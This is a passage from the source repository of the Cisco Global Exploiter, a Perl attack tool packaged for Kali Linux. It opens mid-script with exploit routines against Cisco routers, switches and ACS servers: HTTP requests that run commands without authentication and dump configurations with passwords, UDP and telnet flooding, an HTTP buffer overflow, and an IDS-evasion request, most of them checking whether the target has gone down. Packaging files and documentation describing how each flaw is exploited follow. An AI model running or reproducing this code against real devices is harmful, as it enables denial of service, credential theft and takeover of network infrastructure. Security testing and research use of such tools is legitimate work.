"No http server detected on $serv ...\n\n"; 306 | 307 | print "Packet sent ...\n"; 308 | print $sockd "$vuln"; 309 | sleep(2); 310 | print "\nServer response :\n\n"; 311 | close($sockd); 312 | exit(1); 313 | } 314 | 315 | sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability 316 | { 317 | my $serv = $host; 318 | my $port = 80; 319 | my $k = ""; 320 | 321 | print "Enter a file to read [ /show/config/cr set as default ] : "; 322 | $k = ; 323 | chomp ($k); 324 | if ($k eq "") 325 | {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";} 326 | else 327 | {$vuln = "GET /exec$k HTTP/1.0\n\n";} 328 | 329 | my $sockd = IO::Socket::INET->new ( 330 | PeerAddr => $serv, 331 | PeerPort => $port, 332 | Proto => "tcp") 333 | || die "No http server detected on $serv ...\n\n"; 334 | 335 | print "Packet sent ...\n"; 336 | print $sockd "$vuln"; 337 | sleep(2); 338 | print "\nServer response :\n\n"; 339 | while (<$sockd>){print} 340 | close($sockd); 341 | exit(1); 342 | } 343 | 344 | sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability 345 | { 346 | my $serv = $host; 347 | my $port = 80; 348 | my $vuln = "GET /error?/ HTTP/1.0\n\n"; 349 | 350 | my $sockd = IO::Socket::INET->new ( 351 | PeerAddr => $serv, 352 | PeerPort => $port, 353 | Proto => "tcp") 354 | || die "No http server detected on $serv ...\n\n"; 355 | 356 | print "Packet sent ...\n"; 357 | print $sockd "$vuln"; 358 | sleep(2); 359 | print "\nServer response :\n\n"; 360 | while (<$sockd>){print} 361 | close($sockd); 362 | exit(1); 363 | } 364 | 365 | sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability 366 | { 367 | my $ip = $host; 368 | my $port = "514"; 369 | my $ports = ""; 370 | my $size = ""; 371 | my $i = ""; 372 | my $string = "%%%%%XX%%%%%"; 373 | 374 | print "Input packets size : "; 375 | $size = ; 376 | chomp($size); 377 | 378 | socket(SS, PF_INET, SOCK_DGRAM, 17); 379 | my $iaddr = inet_aton("$ip"); 380 | 381 | for ($i=0; $i<10000; $i++) 382 | { send(SS, $string, $size, sockaddr_in($port, $iaddr)); } 383 | 384 | printf "\nPackets sent ...\n"; 385 | sleep(2); 386 | printf "Please enter a server's open port : "; 387 | $ports = ; 388 | chomp $ports; 389 | printf "\nNow checking server status ...\n"; 390 | sleep(2); 391 | 392 | socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n"; 393 | my $dest = sockaddr_in ($ports, inet_aton($ip)); 394 | connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n"; 395 | 396 | printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n"; 397 | exit(1); 398 | } 399 | 400 | sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability 401 | { 402 | my $ip = $host; 403 | my $vln = "%%%%%XX%%%%%"; 404 | my $num = 30000; 405 | my $string .= $vln x $num; 406 | my $shc="\015\012"; 407 | 408 | my $sockd = IO::Socket::INET->new ( 409 | Proto => "tcp", 410 | PeerAddr => $ip, 411 | PeerPort => "(2002)", 412 | ) || die "Unable to connect to $ip:2002 ...\n\n"; 413 | 414 | $sockd->autoflush(1); 415 | print $sockd "$string" . $shc; 416 | while (<$sockd>){ print } 417 | print "Packet sent ...\n"; 418 | close($sockd); 419 | sleep(1); 420 | print("Now checking server's status ...\n"); 421 | sleep(2); 422 | 423 | my $sockd2 = IO::Socket::INET->new ( 424 | Proto=>"tcp", 425 | PeerAddr=>$ip, 426 | PeerPort=>"(2002)",); 427 | unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"}; 428 | 429 | print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); 430 | exit(1); 431 | } 432 | 433 | sub cisco11 # Cisco Catalyst Memory Leak Vulnerability 434 | { 435 | my $serv = $host; 436 | my $rep = ""; 437 | my $str = "AAA\n"; 438 | 439 | print "\nInput the number of repetitions : "; 440 | $rep = ; 441 | chomp $rep; 442 | 443 | my $sockd = IO::Socket::INET->new ( 444 | PeerAddr => $serv, 445 | PeerPort => "(23)", 446 | Proto => "tcp") 447 | || die "No telnet server detected on $serv ...\n\n"; 448 | 449 | for ($k=0; $k<=$rep; $k++) { 450 | print $sockd "$str"; 451 | sleep(1); 452 | print $sockd "$str"; 453 | sleep(1); 454 | } 455 | close($sockd); 456 | print "Packet sent ...\n"; 457 | sleep(1); 458 | print("Now checking server's status ...\n"); 459 | sleep(2); 460 | 461 | my $sockd2 = IO::Socket::INET->new ( 462 | Proto=>"tcp", 463 | PeerAddr=>$serv, 464 | PeerPort=>"(23)",); 465 | unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; 466 | 467 | print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\\n"; 468 | close($sockd2); 469 | exit(1); 470 | } 471 | 472 | sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability 473 | { 474 | my $serv = $host; 475 | my $l =100; 476 | my $vuln = ""; 477 | my $long = "A" x $l; 478 | 479 | my $sockd = IO::Socket::INET->new ( 480 | PeerAddr => $serv, 481 | PeerPort => "(80)", 482 | Proto => "tcp") 483 | || die "No http server detected on $serv ...\n\n"; 484 | 485 | for ($k=0; $k<=50; $k++) { 486 | my $vuln = "GET " . $long . " HTTP/1.0\n\n"; 487 | print $sockd "$vuln\n\n"; 488 | sleep(1); 489 | $l = $l + 100; 490 | } 491 | 492 | close($sockd); 493 | print "Packet sent ...\n"; 494 | sleep(1); 495 | print("Now checking server's status ...\n"); 496 | sleep(2); 497 | 498 | my $sockd2 = IO::Socket::INET->new ( 499 | Proto=>"tcp", 500 | PeerAddr=>$serv, 501 | PeerPort=>"http(80)",); 502 | unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; 503 | 504 | print "Target is not vulnerable. Server is still up after 5 kb of buffer ...)\n"; 505 | close($sockd2); 506 | exit(1); 507 | } 508 | 509 | sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF) 510 | { 511 | my $serv = $host; 512 | my $vuln = "GET %u002F HTTP/1.0\n\n"; 513 | 514 | my $sockd = IO::Socket::INET->new ( 515 | PeerAddr => $serv, 516 | PeerPort => "(80)", 517 | Proto => "tcp") 518 | || die "No http server detected on $serv ...\n\n"; 519 | 520 | print "Packet sent ...\n"; 521 | print $sockd "$vuln"; 522 | close($sockd); 523 | sleep(1); 524 | print("Now checking server's status ...\n"); 525 | print("Please verify if directory has been listed ...\n\n"); 526 | print("Server response :\n"); 527 | sleep(2); 528 | while (<$sockd>){ print } 529 | exit(1); 530 | } 531 | 532 | sub cisco14 # Cisco IOS HTTP server DoS Vulnerability 533 | { 534 | my $serv = $host; 535 | my $vuln = "GET /TEST?/ HTTP/1.0"; 536 | 537 | my $sockd = IO::Socket::INET->new ( 538 | Proto=>"tcp", 539 | PeerAddr=>$serv, 540 | PeerPort=>"http(80)",); 541 | unless ($sockd){die "No http server detected on $serv ...\n\n"}; 542 | 543 | print $sockd "$vuln\n\n"; 544 | print "Packet sent ...\n"; 545 | close($sockd); 546 | sleep(1); 547 | print("Now checking server's status ...\n"); 548 | sleep(2); 549 | 550 | my $sockd2 = IO::Socket::INET->new ( 551 | Proto=>"tcp", 552 | PeerAddr=>$serv, 553 | PeerPort=>"http(80)",); 554 | unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; 555 | 556 | print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); 557 | close($sockd2); 558 | exit(1); 559 | } -------------------------------------------------------------------------------- /debian/changelog: -------------------------------------------------------------------------------- 1 | cisco-global-exploiter (13-1kali3) kali; urgency=low 2 | 3 | * Removed desktop files 4 | 5 | -- Mati Aharoni Fri, 14 Dec 2012 20:07:50 -0500 6 | 7 | cisco-global-exploiter (13-1kali2) kali; urgency=low 8 | 9 | * Updated desktop file 10 | 11 | -- Mati Aharoni Sat, 01 Dec 2012 08:49:42 -0500 12 | 13 | cisco-global-exploiter (13-1kali1) kali; urgency=low 14 | 15 | * Kali Version 16 | 17 | -- dookie Wed, 07 Nov 2012 10:58:56 -0700 18 | 19 | cisco-global-exploiter (13-1) kali; urgency=low 20 | 21 | * Initial release 22 | 23 | -- dookie Wed, 07 Nov 2012 10:44:53 -0700 24 | -------------------------------------------------------------------------------- /debian/cisco-global-exploiter.install: -------------------------------------------------------------------------------- 1 | cge.pl usr/bin/ 2 | -------------------------------------------------------------------------------- /debian/compat: -------------------------------------------------------------------------------- 1 | 8 2 | -------------------------------------------------------------------------------- /debian/control: -------------------------------------------------------------------------------- 1 | Source: cisco-global-exploiter 2 | Section: net 3 | Priority: extra 4 | Maintainer: dookie 5 | Build-Depends: debhelper (>= 8.0.0) 6 | Standards-Version: 3.9.3 7 | Homepage: http://www.blackangels.it 8 | Vcs-Git: ssh://git@git.kali.org/packages/cisco-global-exploiter.git 9 | Vcs-Browser: http://git.kali.org/gitweb/?p=packages/cisco-global-exploiter.git;a=summary 10 | 11 | Package: cisco-global-exploiter 12 | Architecture: all 13 | Depends: ${misc:Depends}, perl 14 | Description: Simple and fast Cisco exploitation tool 15 | Cisco Global Exploiter (CGE), is an advanced, simple 16 | and fast security testing tool. 17 | -------------------------------------------------------------------------------- /debian/copyright: -------------------------------------------------------------------------------- 1 | Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ 2 | Upstream-Name: cisco-global-exploiter 3 | Source: http://www.blackangels.it 4 | 5 | Files: * 6 | Copyright: Nemesis 7 | E4m 8 | 9 | License: GPL-2+ 10 | This package is free software; you can redistribute it and/or modify 11 | it under the terms of the GNU General Public License as published by 12 | the Free Software Foundation; either version 2 of the License, or 13 | (at your option) any later version. 14 | . 15 | This package is distributed in the hope that it will be useful, 16 | but WITHOUT ANY WARRANTY; without even the implied warranty of 17 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 18 | GNU General Public License for more details. 19 | . 20 | You should have received a copy of the GNU General Public License 21 | along with this program. If not, see 22 | . 23 | On Debian systems, the complete text of the GNU General 24 | Public License version 2 can be found in "/usr/share/common-licenses/GPL-2". 25 | 26 | Files: debian/* 27 | Copyright: 2012 dookie 28 | License: GPL-2+ 29 | This package is free software; you can redistribute it and/or modify 30 | it under the terms of the GNU General Public License as published by 31 | the Free Software Foundation; either version 2 of the License, or 32 | (at your option) any later version. 33 | . 34 | This package is distributed in the hope that it will be useful, 35 | but WITHOUT ANY WARRANTY; without even the implied warranty of 36 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 37 | GNU General Public License for more details. 38 | . 39 | You should have received a copy of the GNU General Public License 40 | along with this program. If not, see 41 | . 42 | On Debian systems, the complete text of the GNU General 43 | Public License version 2 can be found in "/usr/share/common-licenses/GPL-2". 44 | 45 | -------------------------------------------------------------------------------- /debian/docs: -------------------------------------------------------------------------------- 1 | Readme 2 | doc/Documentation 3 | -------------------------------------------------------------------------------- /debian/rules: -------------------------------------------------------------------------------- 1 | #!/usr/bin/make -f 2 | # -*- makefile -*- 3 | # Sample debian/rules that uses debhelper. 4 | # This file was originally written by Joey Hess and Craig Small. 5 | # As a special exception, when this file is copied by dh-make into a 6 | # dh-make output file, you may use that output file without restriction. 7 | # This special exception was added by Craig Small in version 0.37 of dh-make. 8 | 9 | # Uncomment this to turn on verbose mode. 10 | #export DH_VERBOSE=1 11 | 12 | %: 13 | dh $@ 14 | override_dh_auto_build: 15 | 16 | override_dh_auto_install: 17 | 18 | -------------------------------------------------------------------------------- /debian/source/format: -------------------------------------------------------------------------------- 1 | 3.0 (quilt) 2 | -------------------------------------------------------------------------------- /doc/.svn/entries: -------------------------------------------------------------------------------- 1 | 10 2 | 3 | dir 4 | 1733 5 | svn+ssh://dookie@10.0.0.12/var/svn/backtrack/microverse/c/cisco-global-exploiter/source-cisco-global-exploiter-13-bt1/var/backtrack/sources/cisco-global-exploiter/13/bt1/upstream-sources/cisco-global-exploiter/doc 6 | svn+ssh://dookie@10.0.0.12/var/svn/backtrack 7 | 8 | 9 | 10 | 2011-04-18T09:02:05.482722Z 11 | 327 12 | emgent 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | d9273255-a111-4fa6-bf0a-919607b5ba98 28 | 29 | Changelog 30 | file 31 | 32 | 33 | 34 | 35 | 2011-08-26T04:17:59.610183Z 36 | 089e7bd729ccff89457377af6ef0c7fe 37 | 2011-04-18T09:02:05.482722Z 38 | 327 39 | emgent 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 1077 62 | 63 | Documentation 64 | file 65 | 66 | 67 | 68 | 69 | 2011-08-26T04:17:59.610183Z 70 | 4b7909e71663cea53ce69577b6a525d6 71 | 2011-04-18T09:02:05.482722Z 72 | 327 73 | emgent 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 19514 96 | 97 | -------------------------------------------------------------------------------- /doc/.svn/text-base/Changelog.svn-base: -------------------------------------------------------------------------------- 1 | 2 | Cisco Global Exploiter [ 13 Vulnerabilities ] - Released: 08/04/2004 3 | 4 | + Fixed a bug of Cisco IOS HTTP Auth Vulnerability exploit 5 | + Added CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability 6 | + Added Cisco Catalyst Memory Leak Vulnerability 7 | + Added Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability 8 | + Added %u Encoding IDS Bypass Vulnerability (UTF) 9 | + Added Cisco IOS HTTP Denial of Service Vulnerability 10 | + Added complete vulnerabilities documentation 11 | 12 | 13 | 14 | Cisco Global Exploiter [ 8 Vulnerabilities ] - Released: 20/03/2003 15 | 16 | + Cisco 677/678 Telnet Buffer Overflow Vulnerability 17 | + Cisco IOS Router Denial of Service Vulnerability 18 | + Cisco IOS HTTP Auth Vulnerability 19 | + Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability 20 | + Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability 21 | + Cisco 675 Web Administration Denial of Service Vulnerability 22 | + Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability 23 | + Cisco IOS Software HTTP Request Denial of Service Vulnerability 24 | 25 | -------------------------------------------------------------------------------- /doc/.svn/text-base/Documentation.svn-base: -------------------------------------------------------------------------------- 1 | 2 | ## 3 | # Cisco Global Exploiter Documentation 4 | # Vulnerabilities description and exploiting impact 5 | # 6 | # Legal notes : 7 | # The BlackAngels staff refuse all responsabilities 8 | # for an incorrect or illegal use of this document 9 | # or for eventual damages to others systems. 10 | # 11 | # http://www.blackangels.it 12 | ## 13 | 14 | 15 | 16 | [ Table of contents ] 17 | 18 | 1 - Cisco 677/678 Telnet Buffer Overflow Vulnerability 19 | 2 - Cisco IOS Router Denial of Service Vulnerability 20 | 3 - Cisco IOS HTTP Auth Vulnerability & 21 | Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability 22 | 4 - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability 23 | 5 - Cisco 675 Web Administration Denial of Service Vulnerability 24 | 6 - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability 25 | 7 - Cisco IOS Software HTTP Request Denial of Service Vulnerability 26 | 8 - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability 27 | 9 - Cisco Catalyst Memory Leak Vulnerability 28 | 10 - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability 29 | 11 - %u Encoding IDS Bypass Vulnerability (UTF) 30 | 12 - Cisco IOS HTTP Denial of Service Vulnerability 31 | 32 | 33 | 34 | [1] Cisco 677/678 Telnet Buffer Overflow Vulnerability 35 | ====================================================== 36 | 37 | This vulnerability is identified in Cisco Broadband Operating System (CBOS), 38 | an operating system for the Cisco 600 family of routers. 39 | Each vulnerability can cause a Denial of Service by freezing the administrator 40 | premises equipment (CPE). 41 | Vulnerability can be exploited remotely. 42 | 43 | All Cisco DSL CPE devices from the 600 family running CBOS software up to 44 | and including 2.4.4 release are vulnerable. 45 | The complete list of vulnerable hardware models is : 46 | 626, 627, 633, 673, 675, 675e, 676, 677, 677i and 678. 47 | 48 | By sending a large packet to the Telnet port it is possible to freeze the CPE. 49 | It is not necessary to be logged in or to authenticate in any way. 50 | Telnet is enabled by default. 51 | 52 | By repeatedly exploiting these vulnerabilities an attacker can cause a Denial 53 | of Service for an indeterminate period of time. 54 | 55 | 56 | [2] Cisco IOS Router Denial of Service Vulnerability 57 | ==================================================== 58 | 59 | A defect in multiple releases of Cisco IOS software will cause a Cisco router 60 | or switch to halt and reload if the IOS HTTP service is enabled and browsing 61 | to "http:///%%" is attempted. 62 | This defect can be exploited to produce a Denial of Service attack. 63 | 64 | The vulnerability, affects virtually all mainstream Cisco routers and switches 65 | running Cisco IOS software releases 11.1 through 12.1, inclusive. 66 | The vulnerability can be mitigated by disabling the IOS HTTP server, using an 67 | access-list on an interface in the path to the router to prevent unauthorized 68 | network connections to the HTTP server, or applying an access-class option directly 69 | to the HTTP server itself. 70 | The IOS HTTP server is enabled by default only on Cisco 1003, 1004, and 1005 71 | routers that are not configured. 72 | In all other cases, the IOS HTTP server must be explicitly enabled in order 73 | to exploit this defect. 74 | Cisco devices that may be running affected releases include : 75 | Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 2500, 2600, 76 | 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 6400, 7000, 7200, 77 | ubr7200, 7500, 12000 series, LS1010 ATM switch, Catalyst 6000, 2900XL, 3500XL 78 | LAN switches and Cisco DistributedDirector. 79 | 80 | Any affected Cisco IOS device that is operating with the HTTP server enabled 81 | and is not protected against unauthorized connections can be forced to halt 82 | for a period of up to two minutes and then reload. 83 | 84 | The vulnerability can be exercised repeatedly, possibly creating a Denial 85 | of Service attack, until such time as the HTTP server is disabled, the router 86 | is protected against the attack, or the software on the router is upgraded to 87 | an unaffected release of IOS. 88 | In rare instances when a router at a remote location fails to reload, an 89 | administrator must visit the physical device to recover from the defect. 90 | 91 | 92 | [3] Cisco IOS HTTP Auth Vulnerability & Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability 93 | ================================================================================================================== 94 | 95 | When the HTTP server is enabled and local authorization is used, it is possible, 96 | under some circumstances, to bypass the authentication and execute any command 97 | on the device. 98 | In that case, the user will be able to exercise complete control over the device. 99 | All commands will be executed with the highest privilege (level 15). 100 | 101 | All releases of Cisco IOS software, starting with release 11.3 and later, are 102 | vulnerable. 103 | Virtually all mainstream Cisco routers and switches running Cisco IOS software 104 | are affected by this vulnerability. 105 | Products that are not running Cisco IOS software are not vulnerable. 106 | Any device running Cisco IOS software release 11.3 and later is vulnerable. 107 | Cisco devices that may be running with affected Cisco IOS software releases 108 | include but are not limited to : 109 | Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 1400, 1500, 110 | 1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, 111 | AS5800, 6400, 7000, 7100, 7200, ubr7200, 7500, 12000 series, LS1010 ATM switch, 112 | Catalyst 6000, 5000, 2900XL, 3500XL, LAN switch and Cisco Distributed Director. 113 | 114 | By sending a crafted URL it is possible to bypass authentication and execute any 115 | command on the router at level 15 (enable level, the most privileged level). 116 | This will happen only if the user is using a local database for authentication 117 | (usernames and passwords are defined on the device itself). 118 | The same URL will not be effective against every Cisco IOS software release and 119 | hardware combination. However, there are only 84 different combinations to try, 120 | so it would be easy for an attacker to test them all in a short period of time. 121 | The URL in question follows this format : 122 | 123 | http:///level/n/exec/.... 124 | 125 | where n is a number between 16 and 99. 126 | 127 | An attacker can exercise complete control over the device. 128 | By exploiting this vulnerability, the attacker can see and change the 129 | configuration of the device. 130 | 131 | 132 | [4] Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability 133 | ======================================================================== 134 | 135 | Non-Secure Shell (SSH) connection attempts to an enabled SSH service on a Cisco 136 | Catalyst 6000, 5000, or 4000 switch might cause a "protocol mismatch" error, 137 | resulting in a supervisor engine failure. 138 | The supervisor engine failure causes the switch to fail to pass traffic and 139 | reboots the switch. 140 | 141 | Only the following images are affected : 142 | cat4000-k9.6-1-1.bin, cat5000-sup3cvk9.6-1-1a.bin, cat5000-sup3k9.6-1-1.bin, 143 | cat5000-supgk9.6-1-1.bin, cat6000-sup2cvk9.6-1-1a.bin, cat6000-sup2k9.6-1-1a.bin, 144 | cat6000-supcvk9.6-1-1a.bin, cat6000-supk9.6-1-1a.bin, cat6000-sup2cvk9.6-1-1b.bin, 145 | cat6000-sup2k9.6-1-1b.bin, cat6000-supcvk9.6-1-1b.bin and cat6000-supk9.6-1-1b.bin. 146 | 147 | Non SSH protocol connection attempts to the SSH service cause a "protocol mismatch" 148 | error, which causes a switch to reload. 149 | SSH is not enabled by default, and must be configured by the administrator. 150 | 151 | This vulnerability enables a Denial of Service attack on the Catalyst switch. 152 | 153 | 154 | [5] Cisco 675 Web Administration Denial of Service Vulnerability 155 | ================================================================ 156 | 157 | Any router in the Cisco 600 family that is configured to allow Web access can 158 | be locked by sending a specific URL. 159 | Web access is disabled by default, and it is usually enabled in order to 160 | facilitate remote configuration. 161 | 162 | The affected models are : 163 | 627, 633, 673, 675, 675E, 677, 677i and 678. 164 | These models are vulnerable if they run any of the following, or earlier, 165 | CBOS releases: 166 | 2.0.1, 2.1.0, 2.1.0a, 2.2.0, 2.2.1, 2.2.1a, 2.3, 2.3.2, 2.3.5, 2.3.7 and 2.3.8. 167 | 168 | The behavior is caused by inadequate URL parsing in CBOS. 169 | Each URL was expected to terminate with a minimum of a single space character 170 | (ASCII code 32, decimal). 171 | Sending a URL that does not terminate with a space causes CBOS to enter an 172 | infinite loop. 173 | It is necessary to power cycle the router to resume operation. 174 | To exploit this vulnerability, a router must be configured to accept Web connections. 175 | Having a Web access password configured does not provide protection against this 176 | vulnerability. 177 | 178 | By sending a tailored URL to a router, it is possible to cause a Denial of Service. 179 | Every affected router must be powered off and back on in order to restore its normal 180 | functionality. 181 | 182 | 183 | [6] Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability 184 | ================================================================= 185 | 186 | The Catalyst 3500 XL series switches web configuration interface letsany user 187 | execute any command on the system without logging in. 188 | 189 | Affected systems are : 190 | Cisco Catalyst 3500 XL series switches and all switches that uses similiar 191 | softwares. 192 | 193 | Cisco Catalyst 3500 XL series switches have a webserver configuration interface. 194 | This interface lets any anonymous web user execute any command without supplying 195 | any authentication credentials by simply requesting the "/exec" location from the 196 | webserver. 197 | An example follows : 198 | 199 | http://target/exec/show/config/cr 200 | 201 | This URL will show the configuration file, with all user passwords. 202 | 203 | 204 | [7] Cisco IOS Software HTTP Request Denial of Service Vulnerability 205 | =================================================================== 206 | 207 | A defect in multiple releases of Cisco IOS software will cause a Cisco router or 208 | switch to halt and reload if the IOS HTTP service is enabled, browsing to 209 | "http://target/anytext?/" is attempted, and the enable password is supplied 210 | when requested. 211 | This defect can be exploited to produce a Denial of Service attack. 212 | 213 | Cisco devices that may be running with affected IOS software releases include : 214 | Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 1400, 1500, 215 | 1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 216 | 6400, 7000, 7200, ubr7200, 7500, 12000 series, LS1010 ATM switch, Catalyst 6000, 217 | 2900XL, LAN switch 1900, 2800, 2900, 3000, and 5000 and Cisco Distributed Director. 218 | 219 | The HTTP server was introduced in IOS release 11.0 to extend router management to 220 | the worldwide Web. 221 | The "?" (question mark) character is defined in the HTML specifications as a 222 | delimiter for CGI arguments. 223 | It is also interpreted by the IOS command-line interface as a request for help. 224 | As of Cisco IOS Software Release 12.0T, the meaning of a question mark when it 225 | appears adjacent to a "/" (slash) character cannot be determined properly by the 226 | URI parser in affected versions of Cisco IOS software. 227 | When a URI containing "?/" is presented to the HTTP service on the router and a 228 | valid enable password is supplied, the router enters an infinite loop. 229 | A watchdog timer expires two minutes later and forces the router to crash and reload. 230 | The router continues to be vulnerable to this defect as long as it is running an 231 | affected IOS software release and the enable password is known. 232 | This vulnerability may only be exploited if the enable password is not set, it is 233 | well known, or it can be guessed. 234 | In rare cases, an affected device fails to reload, which means an administrator must 235 | physically cycle the power to resume operation. 236 | The HTTP server is not enabled by default except on unconfigured Cisco model 1003, 237 | 1004 and 1005 routers. 238 | Once initial access is granted to configure the router, the administrator may set an 239 | enable password, and disable or limit access to the HTTP server by changing the 240 | configuration. 241 | Once the new configuration has been saved, the HTTP server will not be enabled when 242 | the router restarts. 243 | 244 | An affected Cisco IOS device that is operating with the HTTP service enabled and is 245 | not protected by having the enable password configured can be forced to halt for up 246 | to two minutes and then reload. 247 | The vulnerability can be exercised repeatedly, possibly creating a Denial of Service 248 | attack, unless the service is disabled, the enable password is set, or the router is 249 | upgraded to a fixed release. 250 | In instances in which a router at a remote location fails to reload, an administrator 251 | must visit the site to enable the device to recover from the defect. 252 | 253 | 254 | [8] CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability 255 | ========================================================================= 256 | 257 | Cisco Secure Access Control Server (ACS) for Windows contains two vulnerabilities. 258 | One vulnerability can lead to the execution of an arbitrary code on an ACS server, 259 | and the second can lead to an unauthorized disclosure of information. 260 | 261 | The affected product is : 262 | Cisco Secure Access Control Server for Windows 2.6.x and ACS 3.0.1. 263 | 264 | By connecting to port 2002 and sending a crafted URL, it is possible to, in a less 265 | severe case, kill the CSADMIN module or, in a sever case, to execute an arbitrary 266 | user-supplied code. 267 | The functionality of authentication, authorization, and accounting (AAA) is not 268 | affected by termination of the CSADMIN module. This means that users will be able to 269 | authenticate normally. 270 | Only the administration function will be affected. Port 2002 is used by the CSADMIN 271 | module for remote administration. 272 | By providing a URL containing formatting symbols (for example, %s, %p), it is possible 273 | to execute a user-provided code. 274 | 275 | By exploiting the format vulnerability, an attacker may execute arbitrary code on the 276 | machine. 277 | This code will be executed in the same context as the CSADMIN process, and that is as 278 | administrator. 279 | Executing arbitrary code will lead to a total compromise of the machine. 280 | By exploiting the directory traversal vulnerability, an attacker can gain unauthorized 281 | access to information in the following file types: html, htm, class, jpg, jpeg or gif. 282 | The main issue may be html files with hardcoded passwords or other sensitive information. 283 | 284 | 285 | [9] Cisco Catalyst Memory Leak Vulnerability 286 | ============================================ 287 | 288 | A series of failed telnet authentication attempts to the switch can cause the Catalyst 289 | Switch to fail to pass traffic or accept management connections until the system is 290 | rebooted or a power cycle is performed. 291 | All types of telnet authentication are affected, including Kerberized telnet, and 292 | AAA authentication. 293 | 294 | Affected systems are : 295 | Catalyst 4000 and 5000 images running version 4.5(2) up to 5.5(4) and 5.5(4a) and 296 | Catalyst 6000 images running version 5.3(1)CSX, up to and including 5.5(4) and 5.5(4a). 297 | The Catalyst 4000 series is installed on the Catalyst 2948G, 2980G, 4003, 4006, and 298 | 4912G switches. 299 | The Catalyst 6000 series is installed on the Catalyst 6009, 6006, 6509, 6509-NEB, and 300 | 6506 modular chassis switches. 301 | 302 | The telnet process fails to release resources upon a failed authentication, or a 303 | successful login of extremely short duration such as a telnet from within an automated 304 | script. 305 | This memory leak eventually results in the failure of the switch to perform any other 306 | processes, such as forwarding traffic or management; a power cycle or reboot is required 307 | for recovery. 308 | The command "show process memory" will indicate increased "Holding" memory after failed 309 | telnet authentication attempts. This value will not decrease over time except when a reboot, 310 | reload, or power cycle occurs. This bug may be triggered over a period of time in the 311 | course of normal operation by legitimate users that occasionally fail authentication. 312 | 313 | This vulnerability enables a Denial of Service attack on the Catalyst switch. 314 | 315 | 316 | [10] Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability 317 | ==================================================================== 318 | 319 | Certain versions of Cisco CatOS ship with an embedded HTTP server. 320 | Switches that run these versions of CatOS are prone to a denial of service, which is due to 321 | a remote buffer overflow condition in the HTTP server. 322 | This issue is reported to affect CatOS versions 5.4 through 7.4 which contain "cv" in the 323 | image name. 324 | 325 | Affected systems are : 326 | Cisco CatOS 5.4, 5.5(13a), 5.5, 6.1(2), 6.1, 7.3 and 7.4. 327 | 328 | This vulnerability could be exploited by performing a special "GET" request, with a really 329 | big argument; a shellcode could also be used, to get a shell on the remote system or to 330 | execute arbitrary commands. 331 | 332 | 333 | [11] %u Encoding IDS Bypass Vulnerability (UTF) 334 | =============================================== 335 | 336 | Intrusion Detection Systems inspect network traffic for suspect or malicious packet formats, 337 | data payloads and traffic patterns. 338 | Intrusion detection systems typically implement obfuscation defense - ensuring that suspect 339 | packets cannot easily be disguised with UTF and/or hex encoding and bypass the Intrusion 340 | Detection systems. 341 | 342 | The following products are affected : 343 | Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor component and 344 | Cisco Catalyst 6000 Intrusion Detection System Module. 345 | 346 | The %u encoding method is a different encoding method that is understood and parsed by the 347 | IIS web server. 348 | This encoding can be applied to other portions of the url to effectively obfuscate the 349 | attack, preventing detection by many intrusion detection systems available. 350 | Cisco Secure Intrusion Detection System Sensor decoding algorithms have been modified to 351 | detect and parse this unicode form. 352 | 353 | 354 | This method of obfuscation can allow malicious exploitation to bypass current intrusion 355 | detection technology. 356 | 357 | 358 | [12] Cisco IOS HTTP Denial of Service Vulnerability 359 | =================================================== 360 | 361 | The HTTP service facility in the Cisco IOS provides remote management capabilities using 362 | any web browser as client. 363 | It is commonly used to manage remote routers and switches with a simple and 